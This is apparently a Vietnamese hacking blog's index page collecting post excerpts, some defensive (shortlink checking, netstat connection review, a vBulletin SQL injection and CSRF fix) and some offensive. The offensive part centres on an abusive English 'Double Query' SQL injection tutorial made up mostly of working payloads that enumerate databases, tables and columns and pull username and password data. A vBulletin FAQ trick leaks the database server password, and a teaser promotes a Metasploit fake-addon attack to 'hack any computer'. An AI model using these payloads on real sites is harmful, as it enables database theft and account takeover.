Trang

PHP Application Security Checklist

Xem Thêm

 

Thủ thuật kiểm tra link thật của các shortlink nhanh chóng

Hiện có rất nhiều dịch vụ rút gọn link (shortlink), thường thấy như goo.gl, tinyurl.com, bit.ly... Việc rút gọn link giúp cho các liên kết dài dòng được rút lại rất gọn, thuận lợi cho việc chia sẻ chúng với mọi người. Một số dịch vụ rút gọn link cung câp một số tính năng như thống kê lượng người click, số click này đến từ website nào...

Đó là ưu điểm của việc rút gọn link, nhưng có trường hợp một số kẻ xấu lợi dụng các shortlink để link tới các website có nội dung không tốt hay các đến các website có chứa mã độc nhằm lấy cắp thông tin người dùng. Việc biết trước liên kết thực sự một shortlink là việc làm cần thiết.

Sử dụng IDM

Bạn có thể biết trước link thật một shortlink rất dễ dàng bằng chương trình tăng tốc download quen thuộc IDM.

[Hình: kiem-tra-link1.jpg]

[Hình: kiem-tra-link2.jpg]

Trong giao diện IDM, bạn chọn Add URL, rồi nhập shortlink cần kiểm tra vào khung Address > OK. Ngay lập tức link thật sẽ "hiện nguyên hình" trong hộp thoại Download File Info. Nếu thấy website muốn truy cập an toàn bạn có thể an tâm sử dụng shortlink này.

Sử dụng Decryptlinks

Decryptlinks hỗ trợ xem link thật của hơn 70 dịch vụ shortlink thông dụng hiện nay như

[Hình: kiem-tra-link3.jpg]

Cách sử dụng Decryptlinks rất đơn giản. Ban truy cập địa chỉ http://www.decryptlinks.com, paste link rút gọn vào ô decrypt rồi nhấn Decrypt, ít giây sau ban sẽ nhận được link thật phía dưới. Decryptlinks cung cấp thêm một số thông tin về website đó chẳng hạn như title, description, keyword, trust level, screenshot.

[Hình: kiem-tra-link4.jpg]

Ngoài ra, Decryptlinks còn cung cấp thêm add-on cho Firefox giúp việc kiểm tra shortlink tiện lợi, nhanh chóng hơn. Bạn nhấn vào chữ Firefox Addon trên menu bar để cài addon này. Addon này sẽ được tích hợp vào thanh tìm kiếm bên trái Firefox, bạn chỉ việc chọn biểu tượng search Decrypt Short Links, paste link vào rồi Enter.

Sử dụng Unshorten.

Cũng tương tự như Decryptlinks, Unshorten cung cấp khả năng hiện link thật của nhiều dịch vụ shortlink. Trong kết quả trả về, Unshorten đưa ra một số cảnh báo bảo mật về shortlink đó thông qua dịch vụ Web of Trust, các thông tin này bao gồm

[Hình: kiem-tra-link5.jpg]

Trustworthiness: mức độ tin cậy shortlink.
Vendor reliability: mức độ tin cậy của nhà cung cấp.
Privacy: mức độ riêng tư.
Child safety: độ an toàn cho trẻ em.

Hiện tại, Unshorten còn cung cấp extension cho trình duyệt Chrome và Firefox, bạn tải extension này về tại
http://unshorten.it/browser-extensions

[Hình: kiem-tra-link6.jpg]

Sau khi cài đặt thành công, Unshorten sẽ được thêm vào menu ngữ cảnh của trình duyệt, muốn kiểm tra shortlink nào chỉ việc phải chuột vào link đó, chọn Unshorten this link…

Xem Thêm

 

Kiểm tra các kết nối ẩn vào Internet trong Windows

Kết nối Internet của bạn chậm hơn bình thường? Phải chăng máy tính của bạn đã nhiễm malware, spyware hay adware, chúng đang chạy trong chế độ nền và tiêu tốn băng thông mà bạn không hề biết? Sau đây là vài thủ thuật giúp bạn kiểm tra được các kết nối từ máy tính của bạn vào Internet.

Máy tính của bạn đang kết nối đến những đâu?

Với các phiên bản Windows bạn có thể sử dụng câu lệnh netstat trong command prompt. Nó sẽ đưa ra danh sách tất cả các chương trình đang sử dụng kết nối Internet trong một khoảng thời gian nhất định.

Đầu tiên bạn cần chạy command prompt với quyền admin. Từ menu Start bạn gõ “cmd.exe” trong ô tìm kiếm. Bạn sẽ thấy chương trình cmd.exe, hãy click chuột phải vào chương trình đó và chọn “Run as administrator”.

[Hình: cmd1.jpg]

Nếu có hộp thoại của User Account Control yêu cầu xác nhận, bạn chọn Yes.

[Hình: cmd2.jpg]

Trong command prompt, gõ câu lệnh sau và nhấn Enter:

netstat -abf 5 > activity.txt

Tùy chọn -a sẽ hiển thị tất cả các kết nối và cổng đang chờ kết nối. Tùy chọn -b cho bạn biết ứng dụng nào đang kết nối, và -f sẽ cho biết DNS của mỗi kết nối để dễ hiểu hơn về nơi mà kết nối đang tồn tại. Bạn có thể sử dụng thêm tùy chọn -n nếu bạn muốn hiển thị IP của kết nối tới. Số 5 trong câu lệnh cho biết cứ sau 5 giây thì chương trình sẽ kiểm tra lặp lại một lần và kết quả sẽ được lưu trong file activity.txt.

Chờ trong khoảng 2 phút rồi nhấn Ctrl + C để dừng câu lệnh.

[Hình: cmd3.jpg]

Sau khi kết thúc việc ghi dữ liệu hãy mở file activity.txt bằng trình soạn thảo quen thuộc của bạn. Ở đây chúng tôi dùng Notepad.

Nội dung của file activity.txt sẽ là tất cả các tiến trình trên máy bạn (như trình duyệt, chương trình email, chat...) có kết nối vào Internet trong 2 phút chạy chương trình netstat.

[Hình: cmd4.jpg]

Nếu bạn thấy bất cứ process hay tên, địa chỉ website nào lạ, hãy search thông tin về nó trên Google. Có thể đó là một chương trình hệ thống nhưng cũng có thế đó là một chương trình virus, gián điệp... Dù sao nếu bạn nghi ngờ về nó, hãy tìm kiếm thông tin, hỏi trên các diễn đàn đến khi biết chắc chắn nó là gì.

[Hình: cmd5.jpg]

Dùng chương trình CurrPorts để kiểm tra các kết nối ẩn

Bạn cũng có thể sử dụng một phần mềm miễn phí tên CurrPorts để đơn giản hóa cách thức sàng lọc lấy thông tin. Chương trình này cung cấp một giao diện thân thiện hơn giúp bạn xem tất cả các kết nối TCP/IP và cổng UDP đang mở trên máy tính. CurrPorts là một chương trình portable, bạn không cần phải cài đặt để dùng.

[Hình: CurrPorts.jpg]

Bạn sẽ nhận được một file .zip, giải nén nó và chạy file cports.exe. Chương trình hiển thị rất chi tiết và trực quan về các process, port, IP... bạn có thể lưu thông tin chương trình quét được vào các text hay HTML, XML để tiện cho việc phân tích về sau.

neo0 (Howtogeek)

Xem Thêm

 

Xác định tài khoản nguời dùng Gmail bị hack

Xin chào tất cả các bạn!

Hôm nay mình chia sẽ cho các bạn kỹ thuật mà bạn có thể sử để bắt các hacker.

Nếu bạn có nghi ngờ tài khoản Gmail của mình bị truy cập trái phép, các bạn có thể thực hiện theo các bước sau để xác định kẻ đã truy cập và hộp thư của mình.

1. Kiểm tra lịch sử truy cập

- Đăng nhập vào tài khoản Gmail của bạn và bạn kéo xuống bên dưới của trang web.

[Hình: Gmail.jpg]

- Nhấp chọn chi tiết

[Hình: Gmail-Account-Hack.jpg]

Bây giờ, bạn có thể xem danh sách 10 địa chỉ ip mà bạn hay hacker đăng nhập vào tài khoản của bạn.

+> Địa chỉ IP: Là địa chỉ giao thức Internet (IP Address) là một con số được gán cho các thiết bị trong mạng máy tính (PC) như số điện thoại được gán cho mỗi điện thoại.

+> Cột 1 là phương thức truy cập, nếu bạn đang truy cập vào tài khoản Gmail của bạn từ trình duyệt sau đó bạn sẽ thấy trình duyệt trong cột này, nhưng nếu bảng hoạt động gần đây của bạn được hiển thị một số truy cập POP (Outlook, Thunderbird ...), nó có thể là một dấu hiệu rằng tài khoản của bạn đã bị xâm nhập.

+> Cột 2 (Location), cột này cho thấy địa chỉ IP của bạn từ nơi mà bạn đã truy cập tài khoản của bạn. Bạn có thể sử dụng trang web này Locator IP sẽ hỗ trợ bạn trong việc định vị vị trí địa lý của một địa chỉ IP.

Bạn xem thông tin nhiều hơn xem. Bạn sẽ thấy rất nhiều thông tin như ISP, tên, địa chỉ, số điện thoại liên lạc, địa chỉ email ... mà sẽ giúp bạn quyết định xem tài khoản của bạn đã bị xâm nhập hay không.

Nếu thư của bạn hiện đang được truy cập từ một vị trí khác, bạn sẽ thấy danh sách các phiên truy cập trong bảng thông tin . Bạn thay đổi mật khẩu của bạn nếu bạn nghĩ rằng tài khoản của bạn đã bị xâm nhập.

Hy vọng bạn thích bài viết này, chúc các bạn bảo mật tốt hơn.

Xem Thêm

 

Ngăn chặn bị ngắt kết nối khi download trong Windows


Khi đang thực hiện tải các tập tin có dung lượng lớn từ Internet về máy tính. Đột nhiên, Windows rơi vào trạng thái ngủ đông để tiết kiệm năng lượng theo thời gian mặc định đã làm gián đoạn công việc đang thực hiện công việc, tiêu tốn thêm thời gian và phí Intenrnet của bạn.

Bài viết này sẽ giới thiệu một ứng dụng xách tay nhỏ gọn cho phép bạn ngăn chặn các chế độ tự động của Windows như Shutdown, Reboot, Stanby, Turn Off, Hibernation một cách hữu hiệu, ứng dụng có tên Don't Sleep.

[Hình: 11.png]

Don't Sleep là một ứng dụng xách tay không cần cài đặt, sau khi tải về giải nén kích hoạt tập tin thực thi DontSleep.exe để ngăn chặn Windows kích hoạt các chế độ Stanby, Hybrid-Stanby, Hibernation, Reboot, Shutdown nhằm tránh việc mất quyền kiểm soát máy tính của bạn từ các hoạt động ngầm mặc định của Windows. Ngoài ra, ứng dụng cũng có thể ngăn chặn hoạt động của chế độ bảo vệ màn hình để không làm gián đoạn công việc của bạn.

Chức năng

Don't Sleep: cung cấp các tính năng cho phép bạn thực hiện với ứng dụng như:

To-Tray: Hiển thị trên thanh hệ thống.


Hide: Ẩn ứng dụng nếu muốn hiển thị trở lại bạn phải kích hoạt tập tin thực thi dontSleep.exe, không nên sử dụng.


Minimize to tray if Minimize: Hiển thị thu nhỏ trên thanh hệ thống khi bạn muốn thu nhỏ ứng dụng để làm việc với các ứng dụng khác.


Minimize to tray if Close: Hiển thị trên thanh hệ thống khi bạn nhấn đóng cửa sổ ứng dụng.


Enabling the Mini-HTTP feature: Kích hoạt chức năng kết nối với giao thức HTTP qua các cổng mặc định là 8080


Start Parameter: Hiển thị các tham số thực hiện việc vô hiệu hóa các chức năng.


Exit: Thoát khỏi ứng dụng.


System: Cho phép bạn liên kết nhanh với các chức năng của hệ thống như Task Manager, System, Power Config, Desktop, Monitor, Screensaver Timeout, Screensave, User Accounts, System Configuration và System Information.

Nút Option trong khung Blocking ứng dụng cung cấp các chức năng cho phép bạn thực hiện áp đặt thời gian sử dụng với Don't Sleep thông qua 2 tiện ích Program Star, When you reactivate the PC (from stanby...), hiển thị biểu tượng trên thanh hệ thống hoặc khởi động ứng dụng cùng Windows v.v....

Tại khung Timer ứng dụng cung cấp một số tiện ích cho phép bạn thực hiện để kích hoạt lại các tính năng và làm việc với Windows ở các chế độ sau khi thoát khỏi ứng dụng như:

Exit and Stop Blocking: Thoát và ngưng việc vô hiệu hóa các tính năng.


Exit and Shutdown: Thoát và tắt máy tính.


Exit and aggressive Shutdown: Thoát và ép buộc tắt máy tính.


Exit and Standby/Hibernation: Thoát và làm việc với Windows ở chế độ chờ/ngủ đông.


Disable Blocking: Vô hiệu hóa việc ngăn chặn các chế độ của Windows.


Lưu ý: Tác giả khuyên bạn hãy sử dụng chức năng Exit and Stop Blocking để tránh gián đoạn công việc nếu lỡ tay thoát khỏi ứng dụng và không làm tổn hại đến hoạt động của hệ thống khi bị chuyển đổi chế độ một cách bắt buộc.

Link: http://www.download.com.vn/don-t-sleep/download

Xem Thêm

 

SQL Injection - Double Query - Tutorial

Hey guys,

Okay, so I will be showing you how to apply a Double Query Sql Injection...

So what you have to know is that the stuff you're going to read about here does always works 100 % and am telling you that because I have a 10 years experience hacker so suck it...



Anyways, lets begin:


Some people may be wondering that there's lots of types for Sql Injection but when the fuck am I suppose to use this one and when the fuck I am suppose that one... So yeah, about MySql Double Query Sql Injection you use this method more then once but mostly you use it when you're applying:

Code:


Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,6--

No that's just an example, it can be Union All Select it can be String Injection it can be whatever you want, just, when you do so, it will give you a MySql Error that is similar to the shit in that box down there:

Code:
Mã:
Different Number of Columns

So when this happens don't open Havij or whatever that Gay Tool you love... Use your fucking knowledge...

Anyways, now I will show you the steps and I will try to explain what's happening down there and I will also show you what some People uses and what I use (which is actually, the stuff you should use).


Ok, so now, we got this gay "Different Number of Columns" Error, firstly we say "We don't give a shit" Secondly we begin our attack...


Ok, lets get the boring stuff but they are important:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(version(),user(),@@hostname,0x7e,@@datadir) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now as you can see, this will show you the Version, the User, the Hostname and the Datadir...

Now some people just add "version()" why? I mean why the fuck do you wanna get them one by one when you can get them all together at once...

So whatever happens stick to that code up there and enough with bullshits...


Okay, so now we got these info, now lets get the Databases...

Many many fucking noob people use this in all their Sql Injection not only in Double Query : database()
Well, for these people: do you fucking know that this is gay?
This will only show you only 1 Database... If the Website you're hacking have like 10 database your query is a fucking fail so never use that...

Example for Double Query:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

as you can see, the stuff up there is the gay stuff that most people use... Stop using that please, just fucking stop...

use this one:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,schema_name,7,8 from information_schema.schemata--

And this will show you ALL THE DATABASES AT ONCE...

but using this gay code:

Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,database(),7,8--

will only show 1 Database...



Ok so now he have all the Databases, lets move on to getting the Tables...

This is what you should use to get the Tables:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x"HEXDATABASE" AND table_name=0x"HEXTABLENAME" LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now here, it's just like getting the tables but we're getting the columns, to get the columns we should also Say from which Table so we just add "And table_name=0xHEXEDTABLENAME"
Surely, you have to put the hex of the Table Name instead of that and Increase the Limits to get all the Columns...


Now lets Retrieve Data from the Columns, that's the good part lol:

So that's the part were the gayness appear from couple of people out there, so I will actually show you how to do it the right way...

Let me first show you what other people use and how gay it is and why...

Some people use this:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast("tablename"."columnname" as char),0x27,0x7e) FROM "databasename"."tablename" LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

So as you can see, the people who uses this code are very detailed but kind of gay... they use tablename.columnname
Why is that weak? firstly no need to write the same thing over and over again because in the same query you're saying which Table when you write databasename.tablename... Secondly this will only show you the data of 1 column? Why? Why don't you see the Data of 14213451234 Columns at a time? It's faster, so stop being fucking stupid...


Now some people use this one:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select concat(username,0x7e,pass,0x7e7e) from "table" limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now this is better, as you can see we are retreiving the Data of more then 1 column at a time which is good but where it says from "table" is the bad thing because you're not precising which Database and you don't want to risk that because what if there's 2 Databases and both of them have the same table name but with different data you will be like owned by yourself...

So here's what to use:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from database.table limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

So why this is better? Firstly because we're getting Data from more then 1 column at once and secondly because we're giving the right details to get the right info by using database.table, so we're just giving it everything the right way...


Some Fucking Stuff you should know:

1- Never forget to increase the limits
2- Sometimes you can use Char instead of Hex if it didn't work but this is very very rare
3- Doing a Sql Injection is simple, you should just understand what you're typing and pretend you're talking to somebody...
4- Don't be stupid


Okay we're done, this took me a while to write and I don't really fucking care if you like it or not but I am pretty sure this will increase your knowledge in a way or another and will get us more members here...

Take care all,

Xem Thêm

 

Share Code AppFB.org

http://www.mediafire.com/?gr9z3cjic9du354

Xem Thêm

 

Multiple MySQL database Zero-day vulnerabilities published


Researcher discovered Multiple Zero-day vulnerabilities in MySQL database software including Stack based buffer overrun, Heap Based Overrun, Privilege Elevation, Denial of Service and  Remote Preauth User Enumeration.
Common Vulnerabilities and Exposures (CVE) assigned as :
CVE-2012-5611 — MySQL (Linux) Stack based buffer overrun PoC Zeroday
CVE-2012-5612 — MySQL (Linux) Heap Based Overrun PoC Zeroday
CVE-2012-5613 — MySQL (Linux) Database Privilege Elevation Zeroday Exploit
CVE-2012-5614 — MySQL Denial of Service Zeroday PoC
CVE-2012-5615 — MySQL Remote Preauth User Enumeration Zeroday
Multiple+MySQL+database+Zero-day+Vulnerabilities+published

Eric Posted MySQL Database Privilege Elevation 0day Exploit Demo:

Xem Thêm

 

Hướng dẫn khắc phục 2 lỗi bảo mật nghiêm trọng của vBulletin

SinhVienIT.NET---vbulletin-security-alert


2 lỗi mà mình nói đến là lỗi SQL Injection của mod Chang stat và lỗi CSRF để add plugin.

1. Lỗi SQL Injection của Changuondyu Statistics
Khi khai thác lỗi này, attacker sẽ lấy được gần như toàn bộ database của bạn nếu muốn. Và thông thường, cái attacker nhắm đến là table user. Khi lấy được 3 cột: userid, password và salt => Attacker có thể login vào tài khoản của bất kỳ user nào mà không cần biết password là gì (Với điều kiện là Admin không biết config đúng file config.php cùa vBB).
Để fix lỗi này, có 2 cách mình đề xuất các bạn có thể thực hiện.

Cách 1:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data

Tìm:
PHP Code:
$foruminid $vbulletin->db->escape_string($_REQUEST['listforumid']); 
Thêm vào bên dưới
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminid preg_replace("/[^0-9,]+/","",$foruminid);//---End---By: Vũ Thanh Lai - SinhVienIT.Net 

Cách 2:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data

Tìm:
PHP Code:
$foruminid $vbulletin->db->escape_string($_REQUEST['listforumid']); 
Thêm vào bên dưới
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminidx explode(',',$foruminid);
foreach(
$foruminidx as &$id)
{
    
$id=intval($id);
}
$foruminid=implode(',',$foruminidx);//---End---By: Vũ Thanh Lai - SinhVienIT.Net 


2. Lỗi CSRF
Với lỗi này, attacker phải có quyền từ SMod trở lên. Nếu nói đây là 1 lỗi thì cũng chưa chuẩn lắm. Vì nếu nó là 1 lỗi thì chả khác nào câu "Hacked by Admin" 4
Tuy nhiên, dù thế nào đi nữa, cái này cũng giúp 1 user có quyền SMod "leo thang đặc quyền được".

Cách khai thác lỗi này thì cũng đã được công bố chi tiết.

Để fix lỗi này mình đề xuất 2 cách.

Cách 1:
Đây là cách đơn giản nhất là bạn đổi thư mục AdminCP và không tiết lộ thư mục AdminCP mới cho bất kỳ ai biết.
Sau khi đổi nhớ sửa lại tên thư mục admin trong file config.php ở phần
PHP Code:
$config['Misc']['admincpdir'
Tuy nhiên, khi sử dụng cách này thì sẽ có thể gây ra 1 số mod có phần admincp hoạt động sai hoặc ko hoạt động... Nên khi dùng cách này các bạn cần lưu ý.


Cách 2:
Bạn sử dụng Mod này. Khi dùng mod này, mỗi lần có 1 request gửi đến AdminCP thì referer trong HTTP Header sẽ đc kiểm tra xem request đó đến từ trang nào trong forum. Nếu không phải từ AdminCP thì bạn phải click xác nhận thì request mới đc tiếp tục xử lý.

Attacker đã làm như thế nào ?
Thời gian gần đây, attacker hay đi lục lọi các forum có sử dụng mod Changuondyu Statistics để tìm cách đưa câu "Hacked by..." vào đó. Sau khi khai thác lỗi này, chúng sẽ login đc vào tài khoản của SMod hoặc Admin để lợi dụng tiếp lỗi thứ 2 bên trên để chèn shell. Và thế là xong 4

Các Admin đã ngây thơ như thế nào ?
Trong file config.php của vBulletin có 1 phần mà hầu hết các Admin đều bỏ qua đó là COOKIE SECURITY HASH
PHP Code:
$config['Misc']['cookie_security_hash'
Thông thường, các admin để trống phần này trong file config mà không hề biết tầm quan trọng của nó. Để hiểu nó quan trọng như thế nào. Mình sẽ nói chi tiết để các bạn hiểu cơ chế hoạt động của nó.

Khi 1 user login vào forum nếu có check dấu ghi nhớ để lần sau không phải login lại khi hết cookie timeout thì phía client sẽ có 3 cookie đc thiết lập.
cookieprefix_userid,cookieprefix_password và cookieprefix_remember

cái userid và remember chắc mình không cần nói, cái password nó không phải là password của người dùng, cũng không phải là password trong cột password của table user.
Nó là kết quả
PHP Code:
MD5(Cột_Password_Trong_table_User.$config['Misc']['cookie_security_hash']) 
Như vậy, nếu attacker khai thác đc 1 lỗi SQL Injection nào đó trên forum của bạn và lấy đc 1 số record trong table user mà giá trị cookie_security_hash bạn để trống trong file config.php thì tất nhiên, attacker sẽ dễ dàng login đc vào bất kỳ tài khoản nào bằng cách thiết lập cookie trên trình duyệt 3 cookie mình đã để cập bên trên.

Còn nếu bạn có thiết lập giá trị cookie_security_hash ? Attacker không thể biết đc giá trị này nếu chưa attack vào đc host của bạn hay có shell trên server. Như vậy, cho dù có lấy đc cả table user thì attacker cũng không thể nào login vào bất kỳ tài khoản nào cả (ngoại trừ trường hợp bạn sử dụng password quá đơn giản như 123456 4)

Vì vậy, khi đọc xong bài này, hãy mở ngay file config của bạn lên và thêm 1 chuỗi ký tự bất kỳ vào $config['Misc']['cookie_security_hash'] nhé. Làm ngay và luôn kẻo bị attack nhé 4

Nguồn: Sinhvienit.net

Xem Thêm

 

vBulletin 3.x <= 4.2.0 FAQ (Echo config) trick


Go to acp, Faq Manager and then edit a FAQ, add the following code:

{$vbulletin->config['MasterServer']['servername']}
{$vbulletin->config['MasterServer']['username']}
{$vbulletin->config['MasterServer']['password']}
{$vbulletin->config['Database']['dbname']}

Save it.
Go to http://[path]/faq.php and check it
# 1337day.com [2012-12-07]

Xem Thêm

 

[TUT]Sử dụng metasploit fake addon firepux hack any computer

Đây là video tuy còn sơ sài mong anh em ủng hộ thêm , và tut còn nhiều sai sót!trong bài này mọi người có thể dùng kỹ thuật arp để đánh lừa victim!

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương